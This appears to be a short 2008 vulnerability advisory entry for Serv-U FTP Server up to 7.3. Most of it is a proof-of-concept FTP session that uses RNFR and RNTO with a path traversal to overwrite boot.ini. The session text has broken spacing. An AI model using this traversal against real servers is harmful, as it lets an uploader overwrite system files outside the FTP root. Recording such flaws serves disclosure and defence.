Serv-U <= 7.3 Remote FTP File replacement vulnerability-vulnerability warning-the black bar safety net

2008-10-23T00:00:00
ID MYHACK58:62200820796
Type myhack58
Reporter 佚名
Modified 2008-10-23T00:00:00

Description

http://princeb4d.com/Blogs/bugs/200810/20081011095232.Html

Serv-U <= 7.2.0.1 / 7.3 ftp file replacement

user must have upload permissions

(x) dmnt 2008-10-01

2 2 0 Serv-U FTP Server v7. 3 ready... user test 3 3 1 User name okay, need password. pass the test 2 3 0 User logged in, proceed. rnfr any_exist_file. ext 3 5 0 the File or directory exists, ready for destination name. rnto ..\..\..\boot. ini 2 5 0 RNTO command successful.

boot. ini rewrited